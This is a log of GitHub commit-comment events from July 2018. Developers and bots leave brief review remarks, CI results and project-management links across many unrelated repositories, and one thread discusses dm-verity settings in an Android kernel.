{"id":"7924410098","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29609591,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T16:51:36Z","updated_at":"2018-07-05T16:51:36Z","author_association":"CONTRIBUTOR","body":"Dann hat sich wohl ein Fehler eingeschlichen :)"}},"created_at":"2018-07-05T16:51:36Z"}
{"id":"7924411148","type":"CommitCommentEvent","actor":{"login":"geomedia22"},"repo":{"name":"geomedia22/prj-rev-bwfs-tea-cozy"},"payload":{"comment":{"id":29609593,"position":null,"line":null,"path":null,"commit_id":"6f2d616e7efd86826418d90ef824fdf60bac114c","created_at":"2018-07-05T16:51:49Z","updated_at":"2018-07-05T16:51:49Z","author_association":"OWNER","body":"A general comment: Is the above the review of my Tea Cozy submission?\r\n\r\nI see above the following repeated comment: \"binary file not show.\" \r\nDoes this mean I failed to upload the actual image files? Except for the copyright image, I consistently used links to the resources provided, rather than images.\r\nThis notwithstanding, were there other items that were highlighted by the reviewer? \r\nI downloaded the zip file which then was imported into Atom but I don't seem to be able to open the review file itself.\r\n"}},"created_at":"2018-07-05T16:51:49Z"}
{"id":"7924412348","type":"CommitCommentEvent","actor":{"login":"igoldyrev"},"repo":{"name":"igoldyrev/autobagaz"},"payload":{"comment":{"id":29609594,"position":null,"line":null,"path":null,"commit_id":"9518c5a03c5104dc26e116ef270efba17dac4586","created_at":"2018-07-05T16:52:05Z","updated_at":"2018-07-05T16:52:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [feature / admin-login](https://trello.com/c/W7G9rnbT/54-feature-admin-login)"}},"created_at":"2018-07-05T16:52:05Z"}
{"id":"7924413410","type":"CommitCommentEvent","actor":{"login":"erikquinn"},"repo":{"name":"openscope/openscope"},"payload":{"comment":{"id":29609598,"position":49,"line":613,"path":"src/assets/scripts/client/airport/AirportModel.js","commit_id":"2a09c386fa0c4453a51eeb6d966b360c2a90de31","created_at":"2018-07-05T16:52:18Z","updated_at":"2018-07-05T16:52:18Z","author_association":"MEMBER","body":"`this.isOverflight()`"}},"created_at":"2018-07-05T16:52:18Z"}
{"id":"7924414077","type":"CommitCommentEvent","actor":{"login":"igoldyrev"},"repo":{"name":"igoldyrev/autobagaz"},"payload":{"comment":{"id":29609599,"position":null,"line":null,"path":null,"commit_id":"27faaad328714f2ec71b28d0dfb0aad6f0752664","created_at":"2018-07-05T16:52:26Z","updated_at":"2018-07-05T16:52:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [feature / admin-login](https://trello.com/c/W7G9rnbT/54-feature-admin-login)"}},"created_at":"2018-07-05T16:52:26Z"}
{"id":"7924414693","type":"CommitCommentEvent","actor":{"login":"lisakowen"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29609601,"position":24,"line":4876,"path":"gpdb-doc/dita/ref_guide/config_params/guc-list.xml","commit_id":"5c7bad60cd37303da5a5ab39cffa624e27105751","created_at":"2018-07-05T16:52:34Z","updated_at":"2018-07-05T16:52:34Z","author_association":"CONTRIBUTOR","body":"what about locating this description of when you might want to use it before the bulleted list above?"}},"created_at":"2018-07-05T16:52:34Z"}
{"id":"7924414835","type":"CommitCommentEvent","actor":{"login":"jernejsk"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29609602,"position":null,"line":null,"path":null,"commit_id":"1a417819cb22d515a20bc5ba42da2ac36d14f405","created_at":"2018-07-05T16:52:36Z","updated_at":"2018-07-05T16:52:36Z","author_association":"CONTRIBUTOR","body":"@igorpecovnik why don't you send above DT patch to mainline? It would be win - win. You would lower the patch burden once it hits stable and others wouldn't need to do it on their own."}},"created_at":"2018-07-05T16:52:36Z"}
{"id":"7924414858","type":"CommitCommentEvent","actor":{"login":"igoldyrev"},"repo":{"name":"igoldyrev/autobagaz"},"payload":{"comment":{"id":29609603,"position":null,"line":null,"path":null,"commit_id":"d05832a1f80991f418bb7e9d14f454ac25266860","created_at":"2018-07-05T16:52:36Z","updated_at":"2018-07-05T16:52:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [feature / admin-login](https://trello.com/c/W7G9rnbT/54-feature-admin-login)"}},"created_at":"2018-07-05T16:52:36Z"}
{"id":"7924415381","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29609605,"position":49,"line":49,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T16:52:43Z","updated_at":"2018-07-05T16:52:43Z","author_association":"NONE","body":"Likely possible to extract urls from html elements using soup library etc, preferable to using regexs"}},"created_at":"2018-07-05T16:52:43Z"}
{"id":"7924419215","type":"CommitCommentEvent","actor":{"login":"lukseven"},"repo":{"name":"lukseven/api2html"},"payload":{"comment":{"id":29609610,"position":null,"line":null,"path":null,"commit_id":"817e2de7be044fe098cd0a60533bbc0dcdf42694","created_at":"2018-07-05T16:53:29Z","updated_at":"2018-07-05T16:53:29Z","author_association":"OWNER","body":"There already is a pull request: https://github.com/tobilg/api2html/pull/1"}},"created_at":"2018-07-05T16:53:29Z"}
{"id":"7924420482","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"KudProject/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29609612,"position":null,"line":null,"path":null,"commit_id":"d14367a84dab6858d715a24df3f9f3ea0076bff5","created_at":"2018-07-05T16:53:45Z","updated_at":"2018-07-05T16:53:45Z","author_association":"NONE","body":"As i know our own  partition (both tissot & mido) didn't use `verify` flag inside /system, it means that we disable the dm-verity. If the partition didn't use `verify` flag so we need this line `return VERITY_STATE_DISABLE` after `int retval = -EINVAL` inside the kernel to disable dm-verity. With both of them, the dm-verity will be disabled by default."}},"created_at":"2018-07-05T16:53:45Z"}
{"id":"7924422359","type":"CommitCommentEvent","actor":{"login":"erikquinn"},"repo":{"name":"openscope/openscope"},"payload":{"comment":{"id":29609620,"position":59,"line":144,"path":"src/assets/scripts/client/math/flightMath.js","commit_id":"2a09c386fa0c4453a51eeb6d966b360c2a90de31","created_at":"2018-07-05T16:54:08Z","updated_at":"2018-07-05T16:54:08Z","author_association":"MEMBER","body":"Use the helper function from math.js or circle.js or something"}},"created_at":"2018-07-05T16:54:08Z"}
{"id":"7924427126","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29609631,"position":47,"line":47,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T16:55:10Z","updated_at":"2018-07-05T16:55:10Z","author_association":"NONE","body":"switching based on data location should be separate from the implementation of the different methods. Split into functions and call from here."}},"created_at":"2018-07-05T16:55:10Z"}
{"id":"7924429854","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29609640,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T16:55:44Z","updated_at":"2018-07-05T16:55:44Z","author_association":"CONTRIBUTOR","body":"hier war noch ein Fehler\r\nhttps://github.com/RFD-FHEM/RFFHEM/pull/245/commits/145b861fb2e706bcf02100e9721dc3e4d8c3fd70"}},"created_at":"2018-07-05T16:55:44Z"}
{"id":"7924435095","type":"CommitCommentEvent","actor":{"login":"faisalzafaruae"},"repo":{"name":"faisalzafaruae/zdpzdparm"},"payload":{"comment":{"id":29609654,"position":null,"line":null,"path":null,"commit_id":"bdd93ff8bee1570580158660888fc537e8b338d9","created_at":"2018-07-05T16:56:50Z","updated_at":"2018-07-05T16:56:50Z","author_association":"OWNER","body":"Changed hostname to gateway"}},"created_at":"2018-07-05T16:56:50Z"}
{"id":"7924440072","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"StackExchange/StackExchange.Redis"},"payload":{"comment":{"id":29609670,"position":null,"line":null,"path":null,"commit_id":"04a7bf90b6ef4817ea5c28b121a32d013debc38d","created_at":"2018-07-05T16:57:54Z","updated_at":"2018-07-05T16:57:54Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-05T16:57:54Z"}
{"id":"7924440737","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29609671,"position":null,"line":null,"path":null,"commit_id":"79376075e3be7f6505dcddd2a853737ffc447a6b","created_at":"2018-07-05T16:58:02Z","updated_at":"2018-07-05T16:58:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-05T16:58:02Z"}
{"id":"7924448301","type":"CommitCommentEvent","actor":{"login":"maksich"},"repo":{"name":"maksich/Project-A"},"payload":{"comment":{"id":29609689,"position":null,"line":null,"path":null,"commit_id":"6e933c8520c00f55402c5a207be6867fda846798","created_at":"2018-07-05T16:59:40Z","updated_at":"2018-07-05T16:59:40Z","author_association":"OWNER","body":"Ready 2 use"}},"created_at":"2018-07-05T16:59:40Z"}
{"id":"7924450608","type":"CommitCommentEvent","actor":{"login":"krasCGQ"},"repo":{"name":"KudProject/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29609697,"position":null,"line":null,"path":null,"commit_id":"d14367a84dab6858d715a24df3f9f3ea0076bff5","created_at":"2018-07-05T17:00:10Z","updated_at":"2018-07-05T17:00:10Z","author_association":"MEMBER","body":"It's not enabled anywhere on custom ROMs. Also no `verify` flag on DTS, so I don't think we're gonna disable a thing that's already disabled (unused)."}},"created_at":"2018-07-05T17:00:10Z"}
{"id":"7924456335","type":"CommitCommentEvent","actor":{"login":"madanadit"},"repo":{"name":"Alluxio/alluxio"},"payload":{"comment":{"id":29609723,"position":7,"line":274,"path":"core/common/src/test/java/alluxio/PropertyKeyTest.java","commit_id":"8163c522e2d85719d5b00564a8cb37d101240e57","created_at":"2018-07-05T17:01:16Z","updated_at":"2018-07-05T17:01:16Z","author_association":"COLLABORATOR","body":"Never mind "}},"created_at":"2018-07-05T17:01:16Z"}
{"id":"7924456338","type":"CommitCommentEvent","actor":{"login":"Biswa96"},"repo":{"name":"mintty/mintty"},"payload":{"comment":{"id":29609724,"position":null,"line":null,"path":null,"commit_id":"c84b1c0f379e84f7388a841d3f3ebafa3ff660f4","created_at":"2018-07-05T17:01:16Z","updated_at":"2018-07-05T17:01:16Z","author_association":"NONE","body":"Question: What is the significant change at line 1152 `curs` variable?"}},"created_at":"2018-07-05T17:01:16Z"}
{"id":"7924465567","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29609748,"position":null,"line":null,"path":null,"commit_id":"22ac4076c81eeb058d4cbaa4b08915720dea3ab4","created_at":"2018-07-05T17:03:17Z","updated_at":"2018-07-05T17:03:17Z","author_association":"COLLABORATOR","body":"<h3>Transitions adjusted</h3>\n\nPreview: <strong><a href='https://17846-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17846-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17846-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-05T17:03:17Z"}
{"id":"7924470466","type":"CommitCommentEvent","actor":{"login":"jjmata"},"repo":{"name":"jjmata/robosat"},"payload":{"comment":{"id":29609760,"position":6,"line":43,"path":"robosat/tools/serve.py","commit_id":"d4936f10a741454377e04887ec6249e25c740902","created_at":"2018-07-05T17:04:23Z","updated_at":"2018-07-05T17:04:23Z","author_association":"OWNER","body":"Oops ... don't know what happened there, thought I diff'ed."}},"created_at":"2018-07-05T17:04:23Z"}
{"id":"7924471286","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29609762,"position":null,"line":null,"path":null,"commit_id":"66e14e6dca9a47529080b7e12c152ed3ff501da7","created_at":"2018-07-05T17:04:34Z","updated_at":"2018-07-05T17:04:34Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T17:04:34Z"}
{"id":"7924472730","type":"CommitCommentEvent","actor":{"login":"ritiek"},"repo":{"name":"idies/pyJHTDB"},"payload":{"comment":{"id":29609764,"position":7,"line":175,"path":"pyJHTDB/dbinfo.py","commit_id":"9e71d953e3e3eff557f25ae1fc6b1b4b1ec6bf3a","created_at":"2018-07-05T17:04:54Z","updated_at":"2018-07-05T17:04:54Z","author_association":"NONE","body":"Hi, where can I find this file? It gives me `OSError: big_channel_Y_COOR.txt not found` every time I try to `import pyJHTDB`."}},"created_at":"2018-07-05T17:04:54Z"}
{"id":"7924473066","type":"CommitCommentEvent","actor":{"login":"pgoodman"},"repo":{"name":"ianklatzco/grr"},"payload":{"comment":{"id":29609767,"position":6,"line":6,"path":"CMakeLists.txt","commit_id":"de2e1c4dd29bdbcd230813eafb5063ef6c4d393c","created_at":"2018-07-05T17:04:58Z","updated_at":"2018-07-05T17:04:58Z","author_association":"NONE","body":"You probably want to enable C, CXX, and ASM languages"}},"created_at":"2018-07-05T17:04:58Z"}
{"id":"7924473873","type":"CommitCommentEvent","actor":{"login":"KhushkiratSingh"},"repo":{"name":"KhushkiratSingh/hello"},"payload":{"comment":{"id":29609769,"position":2,"line":2,"path":"README.md","commit_id":"e99552cde7903675dcee029abdcda45e105eb77c","created_at":"2018-07-05T17:05:10Z","updated_at":"2018-07-05T17:05:10Z","author_association":"OWNER","body":"change commited for a reason"}},"created_at":"2018-07-05T17:05:10Z"}
{"id":"7924476014","type":"CommitCommentEvent","actor":{"login":"robertolima1"},"repo":{"name":"robertolima1/graph"},"payload":{"comment":{"id":29609773,"position":null,"line":null,"path":null,"commit_id":"3bf40a565018fc9c5040f4f82c9159c4adea5a67","created_at":"2018-07-05T17:05:38Z","updated_at":"2018-07-05T17:05:38Z","author_association":"OWNER","body":"Em analise para ser implementado"}},"created_at":"2018-07-05T17:05:38Z"}
{"id":"7924477233","type":"CommitCommentEvent","actor":{"login":"pgoodman"},"repo":{"name":"ianklatzco/grr"},"payload":{"comment":{"id":29609774,"position":66,"line":63,"path":"CMakeLists.txt","commit_id":"de2e1c4dd29bdbcd230813eafb5063ef6c4d393c","created_at":"2018-07-05T17:05:55Z","updated_at":"2018-07-05T17:05:55Z","author_association":"NONE","body":"Unless you're packaging this, you probably want `-mtune=native`"}},"created_at":"2018-07-05T17:05:55Z"}
{"id":"7924478060","type":"CommitCommentEvent","actor":{"login":"antimYT"},"repo":{"name":"Juv1e/CleverChatSpammer"},"payload":{"comment":{"id":29609776,"position":null,"line":null,"path":null,"commit_id":"5e0b35e0b1cf59415ea33d90c77cf69d3837df53","created_at":"2018-07-05T17:06:08Z","updated_at":"2018-07-05T17:06:08Z","author_association":"NONE","body":"Неплохо🤔"}},"created_at":"2018-07-05T17:06:08Z"}
{"id":"7924478838","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29609777,"position":null,"line":null,"path":null,"commit_id":"440df3d6b521958b77ec580ac5b76f7a58f8420e","created_at":"2018-07-05T17:06:17Z","updated_at":"2018-07-05T17:06:17Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-05T17:06:17Z"}
{"id":"7924478934","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"KudProject/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29609780,"position":null,"line":null,"path":null,"commit_id":"d14367a84dab6858d715a24df3f9f3ea0076bff5","created_at":"2018-07-05T17:06:19Z","updated_at":"2018-07-05T17:06:19Z","author_association":"NONE","body":"Hmm, make sense."}},"created_at":"2018-07-05T17:06:19Z"}
{"id":"7924479159","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29609781,"position":null,"line":null,"path":null,"commit_id":"265adf669f9dba0733c2304f4c32313f0130c072","created_at":"2018-07-05T17:06:22Z","updated_at":"2018-07-05T17:06:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Into html : adding header with menu, body with lurem ipsum. Into CSS: I have positioned menu](https://trello.com/c/1gyGETzK/26-into-html-adding-header-with-menu-body-with-lurem-ipsum-into-css-i-have-positioned-menu)"}},"created_at":"2018-07-05T17:06:22Z"}
{"id":"7924479790","type":"CommitCommentEvent","actor":{"login":"greggirwin"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29609783,"position":null,"line":null,"path":null,"commit_id":"963ec55a6bab860f8b259246f794bde6ea0172be","created_at":"2018-07-05T17:06:29Z","updated_at":"2018-07-05T17:06:29Z","author_association":"CONTRIBUTOR","body":"I do, and thought the same thing. How do we do that, though? There's no markdown `#include` feature."}},"created_at":"2018-07-05T17:06:29Z"}
{"id":"7924480871","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29609788,"position":null,"line":null,"path":null,"commit_id":"16c1464edb629a6760803ff4bd335ff1bf02d779","created_at":"2018-07-05T17:06:44Z","updated_at":"2018-07-05T17:06:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Into CSS: I have positioned menu](https://trello.com/c/HwvpJTUn/27-into-css-i-have-positioned-menu)"}},"created_at":"2018-07-05T17:06:44Z"}
{"id":"7924481039","type":"CommitCommentEvent","actor":{"login":"pgoodman"},"repo":{"name":"ianklatzco/grr"},"payload":{"comment":{"id":29609789,"position":68,"line":65,"path":"CMakeLists.txt","commit_id":"de2e1c4dd29bdbcd230813eafb5063ef6c4d393c","created_at":"2018-07-05T17:06:46Z","updated_at":"2018-07-05T17:06:46Z","author_association":"NONE","body":"Probably can remove."}},"created_at":"2018-07-05T17:06:46Z"}
{"id":"7924481255","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29609790,"position":null,"line":null,"path":null,"commit_id":"d71be12a8d036301dc25c8350b573cc2621cabef","created_at":"2018-07-05T17:06:49Z","updated_at":"2018-07-05T17:06:49Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/37117361-0c40-44fa-9b88-6e9263b5d579\n"}},"created_at":"2018-07-05T17:06:49Z"}
{"id":"7924481706","type":"CommitCommentEvent","actor":{"login":"DebabrataSTX"},"repo":{"name":"Seagate/opensea-operations"},"payload":{"comment":{"id":29609791,"position":null,"line":null,"path":null,"commit_id":"c4641419464496070054eb1a9fef402505d09c55","created_at":"2018-07-05T17:06:55Z","updated_at":"2018-07-05T17:06:55Z","author_association":"NONE","body":"@vonericsen can you do a quick review and let me know if it is ok to merge to dev stream. "}},"created_at":"2018-07-05T17:06:55Z"}
{"id":"7924481838","type":"CommitCommentEvent","actor":{"login":"pgoodman"},"repo":{"name":"ianklatzco/grr"},"payload":{"comment":{"id":29609793,"position":69,"line":66,"path":"CMakeLists.txt","commit_id":"de2e1c4dd29bdbcd230813eafb5063ef6c4d393c","created_at":"2018-07-05T17:06:57Z","updated_at":"2018-07-05T17:06:57Z","author_association":"NONE","body":"Probably can remove"}},"created_at":"2018-07-05T17:06:57Z"}
{"id":"7924484707","type":"CommitCommentEvent","actor":{"login":"kunalverma94"},"repo":{"name":"kunalverma94/kunalverma94.github.io"},"payload":{"comment":{"id":29609811,"position":null,"line":null,"path":null,"commit_id":"f5ed74069f9a24b494d016a4248175902597ab48","created_at":"2018-07-05T17:07:37Z","updated_at":"2018-07-05T17:07:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-05T17:07:37Z"}
{"id":"7924488681","type":"CommitCommentEvent","actor":{"login":"ahmadrasyidsalim"},"repo":{"name":"parcel-bundler/website"},"payload":{"comment":{"id":29609821,"position":10,"line":17,"path":"package.json","commit_id":"0a891bdb4596c135451b2fe552f1ce8625e09559","created_at":"2018-07-05T17:08:31Z","updated_at":"2018-07-05T17:08:31Z","author_association":"NONE","body":"Maybe this line `\"build\": \"./build.sh\",` will be change  to `\"build\": \"sh build.sh\",` and windows user can running at local using [git](https://git-scm.com/) IMHO!"}},"created_at":"2018-07-05T17:08:31Z"}
{"id":"7924491609","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29609828,"position":71,"line":71,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-05T17:09:13Z","updated_at":"2018-07-05T17:09:13Z","author_association":"NONE","body":"Yes, exactly. The edge must remain consumed_by."}},"created_at":"2018-07-05T17:09:13Z"}
{"id":"7924492339","type":"CommitCommentEvent","actor":{"login":"ahmadrasyidsalim"},"repo":{"name":"parcel-bundler/website"},"payload":{"comment":{"id":29609831,"position":null,"line":null,"path":null,"commit_id":"0a891bdb4596c135451b2fe552f1ce8625e09559","created_at":"2018-07-05T17:09:22Z","updated_at":"2018-07-05T17:09:22Z","author_association":"NONE","body":"Maybe this line \"build\": \"./build.sh\", will be change to \"build\": \"sh build.sh\", and windows user can running at local using git IMHO!"}},"created_at":"2018-07-05T17:09:22Z"}
{"id":"7924496576","type":"CommitCommentEvent","actor":{"login":"4lex4"},"repo":{"name":"4lex4/scantailor-advanced"},"payload":{"comment":{"id":29609846,"position":null,"line":null,"path":null,"commit_id":"9616b8fca03b20e5d259f20c34f01553df082811","created_at":"2018-07-05T17:10:20Z","updated_at":"2018-07-05T17:10:20Z","author_association":"OWNER","body":"Solves #28 "}},"created_at":"2018-07-05T17:10:20Z"}
{"id":"7924496587","type":"CommitCommentEvent","actor":{"login":"ahmadrasyidsalim"},"repo":{"name":"parcel-bundler/website"},"payload":{"comment":{"id":29609847,"position":null,"line":null,"path":null,"commit_id":"0a891bdb4596c135451b2fe552f1ce8625e09559","created_at":"2018-07-05T17:10:20Z","updated_at":"2018-07-05T17:10:20Z","author_association":"NONE","body":"Maybe this line `\"build\": \"./build.sh\",` will be change to `\"build\": \"sh build.sh\",` and windows user can running at local using [git](https://git-scm.com/). IMHO!"}},"created_at":"2018-07-05T17:10:20Z"}
{"id":"7924497576","type":"CommitCommentEvent","actor":{"login":"mr-azaeldev"},"repo":{"name":"rathena/FluxCP"},"payload":{"comment":{"id":29609848,"position":null,"line":null,"path":null,"commit_id":"e0fa6a8347db17de99b3fe0926dc87c0769262fc","created_at":"2018-07-05T17:10:34Z","updated_at":"2018-07-05T17:10:34Z","author_association":"NONE","body":"Nice."}},"created_at":"2018-07-05T17:10:34Z"}
{"id":"7924498168","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29609855,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T17:10:41Z","updated_at":"2018-07-05T17:10:41Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2927 of 2929 tests passed, 8 test warnings)\n\nMessages:\n\n * 10 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T17:10:41Z"}
{"id":"7924505159","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29609880,"position":14,"line":136,"path":"ariadne/src/Ariadne/Wallet/Backend/KeyStorage.hs","commit_id":"475b25cb8effe7193fb76e7618239ff8dc201377","created_at":"2018-07-05T17:12:12Z","updated_at":"2018-07-05T17:12:12Z","author_association":"MEMBER","body":"It's not used, is it?"}},"created_at":"2018-07-05T17:12:12Z"}
{"id":"7924505566","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29609881,"position":19,"line":19,"path":"game.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:12:17Z","updated_at":"2018-07-05T17:12:17Z","author_association":"NONE","body":"Юнес... мне кажется уже третий раз пишу примерно одно и то же )))\r\nне должно быть никаких вызовов кода \"в воздухе\"...\r\nну спрятал ты код в модуль... суть остается та же\r\n\r\nу меня такое ощущение, что ты игнорируешь мои комментарии...\r\n\r\nпожалуйста сделай следующие вещи:\r\n1. ответь мне на вопросы, которые я задал тебе при предыдущей проверке в этом же файле\r\n2. перепиши код так, как я тебе предлагал это сделать\r\n\r\n"}},"created_at":"2018-07-05T17:12:17Z"}
{"id":"7924508108","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29609887,"position":9,"line":37,"path":"ariadne/src/Ariadne/Wallet/Face.hs","commit_id":"475b25cb8effe7193fb76e7618239ff8dc201377","created_at":"2018-07-05T17:12:50Z","updated_at":"2018-07-05T17:12:50Z","author_association":"MEMBER","body":"Wait, I've fixed it already and then you changed it again :smile: "}},"created_at":"2018-07-05T17:12:50Z"}
{"id":"7924511168","type":"CommitCommentEvent","actor":{"login":"zzwz02"},"repo":{"name":"idies/pyJHTDB"},"payload":{"comment":{"id":29609899,"position":7,"line":175,"path":"pyJHTDB/dbinfo.py","commit_id":"9e71d953e3e3eff557f25ae1fc6b1b4b1ec6bf3a","created_at":"2018-07-05T17:13:30Z","updated_at":"2018-07-05T17:13:30Z","author_association":"CONTRIBUTOR","body":"I updated the repo. big_channel_Y_COOR can be downloaded from https://github.com/idies/pyJHTDB/tree/master/pyJHTDB/data\r\n\r\nSorry about that.\r\n\r\nOn Jul 05, 2018, at 13:04, Ritiek Malhotra <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nHi, where can I find this file? It gives me OSError: big_channel_Y_COOR.txt not found every time I try to import pyJHTDB.\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/idies/pyJHTDB/commit/9e71d953e3e3eff557f25ae1fc6b1b4b1ec6bf3a#commitcomment-29609764>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AEzjapI6TzaiYjDuaid9qgEyuR7ZwGvpks5uDkc2gaJpZM4VEPPe>.\r\n\r\n"}},"created_at":"2018-07-05T17:13:30Z"}
{"id":"7924513186","type":"CommitCommentEvent","actor":{"login":"bugatsinho"},"repo":{"name":"bugatsinho/kodi.yatp"},"payload":{"comment":{"id":29609904,"position":null,"line":null,"path":null,"commit_id":"612bb418e7103ffe9b21c61855861df846b9c74f","created_at":"2018-07-05T17:13:58Z","updated_at":"2018-07-05T17:13:58Z","author_association":"OWNER","body":"Subtitle file has to have the same name with video file to work!\r\notherwise user can set subtitle folder as special://temp or the download path in kodi Settings and load subtitle through audio settings"}},"created_at":"2018-07-05T17:13:58Z"}
{"id":"7924514275","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29609908,"position":64,"line":64,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:14:11Z","updated_at":"2018-07-05T17:14:11Z","author_association":"NONE","body":" from bs4 import BeautifulSoup\r\n soup = BeautifulSoup(html_text, \"lxml\")\r\n for a in soup.findAll(\"a\"):\r\n     print (a[\"href\"])"}},"created_at":"2018-07-05T17:14:11Z"}
